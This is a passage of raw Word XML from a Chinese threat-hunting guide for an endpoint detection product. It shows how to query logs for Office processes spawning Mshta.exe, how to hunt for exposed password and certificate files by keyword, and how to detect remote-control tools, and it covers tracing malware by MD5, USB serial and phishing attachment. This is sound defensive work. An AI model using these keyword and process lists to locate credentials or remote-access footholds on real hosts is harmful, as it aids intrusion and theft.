        <w:t>利用软件漏洞执行恶意代码，常被利用的进程有winword</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe、</w:t>
      </w:r>
      <w:r>
        <w:t>EXCEL.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>POWERPNT.EXE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>AcroRd32.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>EqnEdit.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>iexplore.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>应对攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>存在告警</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="10934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400040" cy="1093470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="26854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400040" cy="2685415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="2710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400040" cy="2710180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
      </w:pPr>
      <w:r>
        <w:t>检索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过日志检索详细信息：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>process_parent_path: "WINWORD.EXE" AND process_name:"Mshta.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，确定原因和失陷范围。（检索条件根据实际变更）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="267843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400040" cy="2678430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:color w:val="172B4D"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>桌面终端敏感信息文件暴露检测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>概念</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全意识比较差的政企员工，可能会把敏感的信息保存成文件，如password</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docx、账户信息.xlsx等。黑客会利用这个特点，搜集客户的信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主动日志检索包含password、pwd、账户信息、.cert等关键字。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>应对攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840" w:hanging="420"/>
      </w:pPr>
      <w:r>
        <w:t>检索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过在威胁追踪页面搜索关键字定位有风险终端，如password.</w:t>
      </w:r>
      <w:r>
        <w:t>docx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="2750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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2750820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="26200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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2620010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远控类等非办公软件使用检测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>概念</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>黑客常常利用流行的远控软件来操作终端。远控软件可能来自黑客的恶意部署或者用户主动安装而常驻的远程服务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检索Team Viewer，Go2Assist，LogMein，AmmyyAdmin，V</w:t>
      </w:r>
      <w:r>
        <w:t>NC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，向日葵等工具的进程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>应对攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840" w:hanging="420"/>
      </w:pPr>
      <w:r>
        <w:t>检索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如检索V</w:t>
      </w:r>
      <w:r>
        <w:t>NC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的使用情况，根据</w:t>
      </w:r>
      <w:r>
        <w:t>VNC S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>erver端服务进程名检索。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="199" w:firstLineChars="95"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="23323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5400040" cy="2332355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="199" w:firstLineChars="95"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后“按统计终端mid统计”，可查看使用的范围。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="199" w:firstLineChars="95"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="23958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5400040" cy="2395855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现恶意文件，确认样本的传播途径</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>概念</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>黑客在渗透过程中往往会用到公开或自研的工具。工具文件可能来自网络钓鱼下载、I</w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传输或内网横向移动等。通过溯源文件传播途径，可以确认被入侵的最初来源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>应对攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840" w:hanging="420"/>
      </w:pPr>
      <w:r>
        <w:t>检索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下根据文件路径或文件名检索。可以看到文件是通过chrome</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe下载。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="29343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5400040" cy="2934335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据文件MD5，确认攻击失陷范围</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>概念</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="199" w:firstLineChars="95"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>黑客利用的恶意工具在内网终端中横向移动时候，会留下痕迹。通过追查文件痕迹在哪些终端中出现，确定有多少终端被攻陷。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>应对攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840" w:hanging="420"/>
      </w:pPr>
      <w:r>
        <w:t>检索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据文件md5检索，并添加“按终端mid统计</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以得知该文件在哪些终端上出现过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="3093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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="3093085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据移动存储设备SN号，确认攻击失陷范围</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>概念</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用U盘在内网中传播，是黑客常用的一种方式。每个U盘会有唯一的</w:t>
      </w:r>
      <w:r>
        <w:t>SN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>码。通过</w:t>
      </w:r>
      <w:r>
        <w:t>SN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>码、U盘传输过的文件加上终端标识（I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或M</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），可以确定一个U盘在多少终端使用过，且传输过什么文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>应对攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840" w:hanging="420"/>
      </w:pPr>
      <w:r>
        <w:t>检索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840" w:hanging="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先根据日志类型“U盘文件传输”或加上可疑文件路径做检索，可以确定usb序列号</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="2521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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2521585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再根据</w:t>
      </w:r>
      <w:r>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盘序列号检索 -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“按终端统计”或“按终端mid统计”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="26225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5400040" cy="2622550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
      </w:pPr>
      <w:r>
        <w:t>钓鱼邮件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击，根据附件内容确认失陷范围</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>概念</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送经过精心设计的钓鱼邮件，诱导用户运行恶意附件或链接是黑客经常利用的渗透方式。通过记录和检索内网终端邮件来往的附件，确定失陷范围。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>应对攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840" w:hanging="420"/>
      </w:pPr>
      <w:r>
        <w:t>存在告警</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能从告警信息里看到outlook身影。一般是通过邮件附件启动了一个程序。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="11626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400040" cy="1162685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="27095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5400040" cy="2709545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840" w:hanging="420"/>
      </w:pPr>
      <w:r>
        <w:t>检索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从告警信息里看到了Allstaff</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>doc文件，可以检索：Allstaff</w:t>
      </w:r>
